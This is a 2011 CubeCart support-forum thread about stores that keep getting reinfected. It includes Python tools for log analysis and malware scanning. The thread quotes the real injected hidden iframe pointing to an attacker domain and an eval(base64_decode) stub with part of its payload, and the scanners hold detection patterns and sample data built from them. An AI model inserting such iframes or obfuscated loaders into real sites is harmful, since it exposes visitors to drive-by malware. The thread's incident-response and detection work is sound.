Guest Posted February 20, 2011

Since yesterday our web site is broken. All of a sudden it started giving this message:

Warning: ini_set() [ref.outcontrol]: Cannot change zlib.output_compression - headers already sent in /home/content/c/i/t/citylifeusa/html/store/ini.inc.php on line 114
Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/index_enc_ion.php on line 31
Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/index_enc_ion.php on line 32
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 213
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 213
Warning: session_regenerate_id() [function.session-regenerate-id]: Cannot regenerate session id - headers already sent in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 214
Warning: Cannot modify header information - headers already sent by (output started at /home/content/c/i/t/citylifeusa/html/store/index.php(1) : eval()'d code:37) in /home/content/c/i/t/citylifeusa/html/store/classes/session/cc_session.php on line 234

I called the hosting company and they said to contact CubeCart about this. They cannot do anything. Does anyone know how to fix this?
Please help.
Robsta Posted February 20, 2011

> I called the hosting company and they said to contact CubeCart about this. They cannot do anything. Does anyone know how to fix this? Please help.

Have you contacted CubeCart support? For a site to just have this start happening without any changes to your store code, it's either a hosting issue (they changed something) or your site files have been changed without your knowledge. Check the file dates on your PHP files for anything recent, around the time this started happening. Look at the files referenced in the error first.
Mike MacKechnie Posted February 28, 2011

I have had the exact same problem since 18th February. It appears to be a trojan, which in my case entered via an out-of-date version of WordPress.
Guest Posted February 28, 2011

I still could not solve the problem. I am not very familiar with these security issues. Did you get it fixed? Please let me know. I'm having sleepless nights because of this issue. :(
Guest Posted February 28, 2011

I opened a ticket with CubeCart support and they were not helpful at all. Instead they wrote back saying that, since this site is blacklisted by Google for malware, I should get the malware issue fixed and then they'll see if there's anything to do with CubeCart. I don't know why the web designer used CubeCart for the shopping cart. I'm so frustrated with CubeCart support.

I found malicious code in the index file. As soon as I delete it, the site comes back perfectly and the shopping cart works too. But the next day, or even a few hours later, the code is generated again in the index and the site gets broken. I don't know where or how to find the root cause. Thank you for the reply.
bsmither Posted February 28, 2011

Please look at the web access logs for your hosting space. Hopefully your hosting provider gives you access to these files. Those access log files will show the file being exploited to damage your site. If you require personal assistance in determining whether you have access to your web access logs and what to look for in them, please send me a private message.
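The log check bsmither recommends, as an added example that is not code from the thread, from CubeCart or from any hosting provider: it parses Apache/NCSA "combined" access log lines, keeps the requests made in a window before the modification time of the rewritten file, ranks them so POSTs and hits on scripts outside the normal store front come first, and then pulls the full history of the client that made them. Every log line, address, path and timestamp below is constructed for the example, and `EXPECTED_SCRIPTS` is an assumed list of legitimate entry points.

```python
"""Pick out the request that rewrote a file from the web access log.

Added example for this thread; not code from the thread, CubeCart or any
hosting provider. All log lines, addresses, paths and times are constructed.
"""
import re
from datetime import datetime, timedelta, timezone

# host ident user [time] "METHOD path protocol" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Scripts a visitor legitimately requests on this (assumed) CubeCart layout.
EXPECTED_SCRIPTS = {"/", "/index.php", "/store/", "/store/index.php", "/store/cart.php"}


def parse_line(line):
    """Parse one combined-format line; None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry


def suspicion_score(entry):
    """Heuristic ordering only: higher means read this request first."""
    path = entry["path"].split("?", 1)[0]
    score = 0
    if entry["method"] == "POST":
        score += 3                       # writes to the site mostly arrive as POSTs
    if path.endswith(".php") and path not in EXPECTED_SCRIPTS:
        score += 2                       # a script nobody should be calling directly
    if "?" in entry["path"] and path not in EXPECTED_SCRIPTS:
        score += 1                       # parameters passed to that odd script
    if entry["method"] == "POST" and entry["referer"] == "-":
        score += 1                       # browsers send a referer when submitting a form
    return score


def requests_before(lines, modified_at, window=timedelta(minutes=10)):
    """Entries within `window` before `modified_at`, most suspicious first."""
    start = modified_at - window
    hits = []
    for line in lines:
        e = parse_line(line)
        if e is not None and start <= e["time"] <= modified_at:
            hits.append(e)
    return sorted(hits, key=suspicion_score, reverse=True)


def history_of(lines, host):
    """Every request from `host`, oldest first: its first hit is usually the way in."""
    entries = [e for e in (parse_line(l) for l in lines) if e is not None and e["host"] == host]
    return sorted(entries, key=lambda e: e["time"])


# Constructed sample log; MTIME is the observed change time of store/index.php.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Feb/2011:02:58:30 +0000] "GET /blog/?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '192.0.2.50 - - [18/Feb/2011:02:01:00 +0000] "GET /store/index.php HTTP/1.1" 200 18422 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Feb/2011:03:12:41 +0000] "GET /store/index.php HTTP/1.1" 200 18422 "-" "Mozilla/5.0"',
    # hypothetical dropped script in a writable upload directory; constructed path
    '198.51.100.7 - - [18/Feb/2011:03:17:02 +0000] "POST /blog/wp-content/uploads/tmp.php HTTP/1.1" 200 312 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [18/Feb/2011:03:17:05 +0000] "GET /blog/wp-content/uploads/tmp.php?x=1 HTTP/1.1" 200 44 "-" "Mozilla/4.0"',
    'not a log line at all',
]
MTIME = datetime(2011, 2, 18, 3, 20, 0, tzinfo=timezone.utc)

if __name__ == "__main__":
    hits = requests_before(SAMPLE_LOG, MTIME)
    for e in hits:
        print(suspicion_score(e), e["time"].isoformat(), e["host"], e["method"], e["path"])
    print("history of", hits[0]["host"])
    for e in history_of(SAMPLE_LOG, hits[0]["host"]):
        print(" ", e["time"].isoformat(), e["method"], e["path"])
```

Run it against the real log with `MTIME` set from `stat` on the reinfected file; the scoring is only a reading order, so read every request in the window, and once a client stands out, its earliest requests (usually well before the window) show where it got in.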
Mike MacKechnie Posted March 3, 2011

I have rebuilt my store from scratch in a different directory, and it is no longer infected. However, all my other subdomains are still infected, which makes me think that there is some rogue code somewhere on one or more of my sites which is regenerating the iframe whenever it is loaded. I have searched for the usual suspects (eval, base64_decode, gzinflate, gzuncompress) but there's got to be something else out there that is doing the damage.

I have also reported it to unmaskparasites.com as follows:

Repeated hacks into all index.htm files; insert of iframe
<iframe src="http://bdfj45jfdkhkm.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>
as first line after the <body> tag, or for index.php instances:
<?php eval(base64_decode('...'));

Sites affected:
http://www.wymeruk.co.uk/
http://www.wymeruk.co.uk/Store
http://mbtp.wymeruk.co.uk/
http://www.scruntlehawk.com/
http://autumn.wymeruk.co.uk/
http://www.removalsbedford.co.uk/
http://www.nicksimper.com/

I edit the files remotely to remove the iframe tags but within 24 hours they are back, usually referencing a new domain name in their src= statement. I have changed all FTP passwords and upgraded WordPress where applicable. All these sites are hosted on the same HostMonster account. http://www.removalsbedford.co.uk/ was running an old version of WordPress prior to the attack.
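The two file checks suggested so far in the thread, Robsta's "look at the file dates" and Mike's search for eval/base64_decode/gzinflate/gzuncompress, combined into one scanner as an added example (not code from the thread, from CubeCart, or from any of the posters' sites). It walks a web root, reports files changed since a given time or carrying a hidden 1x1 iframe or an obfuscation wrapper, and decodes the base64 layer of an eval(base64_decode('...')) stub so the start of the hidden PHP can be read without executing it. The sample file contents are constructed; the base64 prefix is the one quoted in the thread, which is truncated there, so the decoder tolerates a partial final group and missing padding.

```python
"""Scan a web root for the injections described in this thread.

Added example; not code from the thread, CubeCart or any poster's site.
Sample contents are constructed; INJECTED_B64 is the prefix quoted above.
"""
import base64
import binascii
import os
import re
import tempfile
import time

# Wrappers the hand search in the thread looked for, plus one more common one.
OBFUSCATION_FUNCS = ("eval", "base64_decode", "gzinflate", "gzuncompress", "str_rot13")

# eval(base64_decode('...')) stub; group 1 is the blob (possibly truncated).
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)")

# An iframe with a 0 or 1 pixel width/height is invisible to the visitor.
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?[01](?:px)?[\"']?[^>]*>", re.I)

SCAN_EXTENSIONS = (".php", ".inc", ".htm", ".html", ".js")

# Base64 prefix quoted in the thread (93 characters, so one sextet is left over).
INJECTED_B64 = ("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2Zp"
                "bHRlciA9IGFycmF5KCdib")


def decode_base64_payload(b64, limit=None):
    """Decode a blob that may be cut mid-group and lack '=' padding.
    Returns the decoded text (latin-1, so every byte is representable)."""
    b64 = re.sub(r"[^A-Za-z0-9+/]", "", b64)
    if len(b64) % 4 == 1:            # a lone trailing sextet cannot form a byte
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)
    try:
        raw = base64.b64decode(b64)
    except binascii.Error:
        return ""
    text = raw.decode("latin-1")
    return text if limit is None else text[:limit]


def scan_text(text):
    """Findings for one file's contents as (kind, detail) pairs."""
    findings = []
    for m in HIDDEN_IFRAME_RE.finditer(text):
        findings.append(("hidden_iframe", m.group(0)))
    for m in EVAL_B64_RE.finditer(text):
        findings.append(("eval_base64", decode_base64_payload(m.group(1), 60)))
    for name in OBFUSCATION_FUNCS:
        if re.search(r"\b%s\s*\(" % name, text):
            findings.append(("suspicious_call", name))
    return findings


def iter_files(root):
    """Yield (path, mtime, text) for every web file under root."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(SCAN_EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    yield path, os.path.getmtime(path), fh.read()


def analyse(entries, since):
    """Report files modified at or after `since` (epoch seconds) or carrying
    injected code, newest first. `entries` is an iterable of (path, mtime, text)."""
    report = []
    for path, mtime, text in entries:
        findings = scan_text(text)
        if mtime >= since or findings:
            report.append({"path": path, "mtime": mtime,
                           "recent": mtime >= since, "findings": findings})
    return sorted(report, key=lambda r: r["mtime"], reverse=True)


# Constructed sample contents, shaped like the injections quoted in the thread.
SAMPLE_INDEX_HTM = ('<html><body>\n<iframe src="http://bdfj45jfdkhkm.co.cc/'
                    'QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>\n'
                    '<h1>Welcome</h1></body></html>')
SAMPLE_INDEX_PHP = "<?php eval(base64_decode('" + INJECTED_B64 + "')); ?>\n<?php /* store bootstrap */ ?>"
CLEAN_PHP = "<?php echo 'hello'; ?>"

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.htm", SAMPLE_INDEX_HTM), ("store/index.php", SAMPLE_INDEX_PHP),
                           ("store/cart.php", CLEAN_PHP)):
            path = os.path.join(root, name)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="latin-1") as fh:
                fh.write(body)
        for r in analyse(iter_files(root), since=time.time() - 24 * 3600):
            print(r["path"], "recent" if r["recent"] else "old", r["findings"])
```

A `suspicious_call` hit on its own is not proof (some legitimate PHP uses eval or base64_decode), but a file that is both recently modified and carries a decoded payload starting with `error_reporting(0);` is the injection this thread describes. Cleaning it only removes the symptom: if it comes back after the edit, whatever wrote it (a script left in a writable directory, or credentials that still work) is still on the account and must be found, which is what the log check above is for.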
bsmither Posted March 3, 2011

I have a very important question to ask: are your CubeCart installations v4 or v3?
Guest Posted March 3, 2011

My CubeCart version is 4.3.8. I have the same attack as Mike explained. It happened on Feb 18th. The iframe is the same, and also the same insert of iframe "<iframe src="http://bdfj45jfdkhkm.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==", but the malicious code was being generated only inside the store folder's index.php file. And it's also the same as Mike's: eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib...

Last week, every time I deleted this code from the index page the site came back to normal, but the code regenerated after a few hours. But a few days ago I put in a security patch I found in the CubeCart forum and now this code has stopped being generated in my index file. So the site looks okay. But when I type www.citylifeusa.com in Internet Explorer, I can see in the status bar that the web site is redirecting through the hacker's domain http://bdfj45jfdkhkm.co.cc. What do you think I should do about this? I'm sure the problem is not solved even though I don't get that header error message anymore. It looks like the traffic is going through the above bad domain. So have they captured my domain name? I have attached a copy of the malicious code that used to be generated inside the index.php.
bsmither Posted March 3, 2011

You still have the iframe. It appears that the index file in your main site (as opposed to the store folder) has been damaged. I see the refresh to the /store/ folder, however, and a very quick glance through the store code as delivered to my browser shows no damage. I believe they haven't captured your domain name.